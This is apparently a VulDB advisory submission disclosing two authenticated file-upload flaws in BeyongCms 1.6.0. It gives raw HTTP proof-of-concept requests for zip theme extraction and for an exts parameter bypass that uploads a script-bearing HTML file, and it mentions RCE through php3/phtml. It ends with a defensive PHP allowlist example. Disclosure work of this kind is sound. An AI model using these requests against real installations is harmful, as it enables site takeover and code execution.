Submit #558152: BeyongCms 1.6.0 Unrestricted Upload

Title: BeyongCms 1.6.0 Unrestricted Upload
Description: BeyongCms is a lightweight content management system based on the ThinkPHP5.1 framework, suitable for enterprise CMS, individual webmasters, etc., optimized for mobile apps and mini-programs. It provides complete and concise project documentation, facilitating secondary development by developers.

Official Website: https://www.beyongcms.com/index.html
Gitee: https://gitee.com/youyiio/BeyongCms

BeyongCms 1.6.0 contains two file upload vulnerabilities.

File Upload Vulnerability 1

Log in to the backend, first upload a zip file containing a malicious PHP file in the document management section. In the admin/controller/Theme upload method, a file ID is accepted, and the path is retrieved from the database based on the file ID for decompression. Construct the interface, pass in the ID value (can be brute-forced if unknown).

    GET /admin/theme/upload.html?fileId=100013 HTTP/1.1
    Host: 127.0.0.1:9999
    sec-ch-ua: "Not=A?Brand";v="99", "Chromium";v="118"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: admin_token=dc14OLsWoc%2B1vm4A%2FXwwjFvsyEpeg1XHI39ooC2h2upXCFXCF4srh6gFGcvNyNMgg9sFxch%2FHUWpA8Xg4S%2Bg86zbDA; cms_entrance_url=http%3A%2F%2F127.0.0.1%3A9999%2Fcms%2Ffeedback%2Findex.html; Hm_lvt_3d0c1af3caa383b0cd59822f1e7a751b=1744276683; HMACCOUNT=C5E5C2ED1B489DE7; admin_username=18888888888; admin_uid=1; Hm_lpvt_3d0c1af3caa383b0cd59822f1e7a751b=1744283707; PHPSESSID=nuh0gdifure8erdklqa2m1m9ps; admin_1_login_hash=4786394367f7af75eb99d
    Connection: close

After decompression, it is located under the theme path.

File Upload Vulnerability 2

In the common/controller/File upload method, the native ThinkPHP file upload is used, and the suffix is restricted. However, if the request parameter contains the exts parameter, exts will be considered as the allowed file suffix (except for PHP). Find the calling location, admin/controller/File. Taking uploading HTML as an example (if the server supports parsing of php3, phtml, etc., RCE is also possible).

    POST /admin/file/upload.html?exts=html HTTP/1.1
    Host: 127.0.0.1:9999
    Content-Length: 613
    sec-ch-ua: "Not=A?Brand";v="99", "Chromium";v="118"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydZyjjoy48BkB56Gx
    Accept: application/json
    Cache-Control: no-cache
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-platform: "Windows"
    Origin: http://127.0.0.1:9999
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:9999/admin/resource/uploadimage.html
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: admin_token=dc14OLsWoc%2B1vm4A%2FXwwjFvsyEpeg1XHI39ooC2h2upXCFXCF4srh6gFGcvNyNMgg9sFxch%2FHUWpA8Xg4S%2Bg86zbDA; cms_entrance_url=http%3A%2F%2F127.0.0.1%3A9999%2Fcms%2Ffeedback%2Findex.html; Hm_lvt_3d0c1af3caa383b0cd59822f1e7a751b=1744276683; HMACCOUNT=C5E5C2ED1B489DE7; admin_username=18888888888; admin_uid=1; PHPSESSID=nuh0gdifure8erdklqa2m1m9ps; admin_1_login_hash=4786394367f7af75eb99d; Hm_lpvt_3d0c1af3caa383b0cd59822f1e7a751b=1744285741
    Connection: close

    ------WebKitFormBoundarydZyjjoy48BkB56Gx
    Content-Disposition: form-data; name="width"

    undefined
    ------WebKitFormBoundarydZyjjoy48BkB56Gx
    Content-Disposition: form-data; name="height"

    undefined
    ------WebKitFormBoundarydZyjjoy48BkB56Gx
    Content-Disposition: form-data; name="thumbWidth"

    140
    ------WebKitFormBoundarydZyjjoy48BkB56Gx
    Content-Disposition: form-data; name="thumbHeight"

    140
    ------WebKitFormBoundarydZyjjoy48BkB56Gx
    Content-Disposition: form-data; name="file"; filename="ceshi.html"
    Content-Type: image/jpeg

    <script>alert(1)</script>
    ------WebKitFormBoundarydZyjjoy48BkB56Gx--
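
Both issues above come from letting the request decide what is acceptable: a client-supplied exts list checked only against "php", and a zip extracted without looking at its entries. The PHP below is an added example of the corrected checks, not BeyongCms or ThinkPHP code; the allowlist contents, the function names and the sample archive are assumptions constructed for illustration.

```php
<?php
// Assumed server-side allowlists; not taken from BeyongCms.
const UPLOAD_EXTS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'zip'];
const THEME_EXTS  = ['html', 'css', 'js', 'json', 'png', 'jpg', 'gif'];
// Allowlist check: anything not listed (php3, phtml, phar, ...) is refused.
function extension_allowed(string $name, array $allow): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return $ext !== '' && in_array($ext, $allow, true);
}

// A request "exts" value may narrow the server list but never widen it.
function effective_exts(?string $requested, array $allow): array
{
    $asked = array_filter(array_map('trim', explode(',', strtolower((string) $requested))));
    return $asked === [] ? $allow : array_values(array_intersect($allow, $asked));
}

// Entries that must block extraction of a theme archive (hypothetical helper).
function theme_archive_violations(string $zipPath, array $allow): array
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        return ['<unreadable archive>'];
    }
    $bad = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $entry = (string) $zip->getNameIndex($i);
        if (substr($entry, -1) === '/') {
            continue; // directory entry
        }
        // Absolute paths, backslashes and ".." segments could leave the theme directory.
        $escapes = preg_match('#^/|\\\\|(^|/)\.\.(/|$)#', $entry) === 1;
        if ($escapes || !extension_allowed(basename($entry), $allow)) {
            $bad[] = $entry;
        }
    }
    $zip->close();
    return $bad;
}

// Constructed sample: a theme zip holding one template and one .phtml file.
$tmp = tempnam(sys_get_temp_dir(), 'thm');
$z = new ZipArchive();
$z->open($tmp, ZipArchive::OVERWRITE);
$z->addFromString('demo/index.html', '<h1>ok</h1>');
$z->addFromString('demo/view.phtml', 'constructed placeholder');
$z->close();
var_dump(effective_exts('html,phtml', UPLOAD_EXTS), theme_archive_violations($tmp, THEME_EXTS));
unlink($tmp);
```

Extraction should proceed only when the violation list is empty, and upload and theme directories are best served with script execution disabled so that a missed extension is still not run by the web server.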
Source: ⚠️ https://wiki.shikangsi.com/post/share/7e2d3cf9-6463-4331-a1f5-c270d5695266
User: wiki (UID 72124)
Submission: 04/15/2025 10:48 AM (12 months ago)
Moderation: 04/26/2025 11:16 AM (11 days later)
Status: Accepted
VulDB entry: 306342 [youyiio BeyongCms 1.6.0 Document Management Page /admin/theme/Upload.html File unrestricted upload]
Points: 20
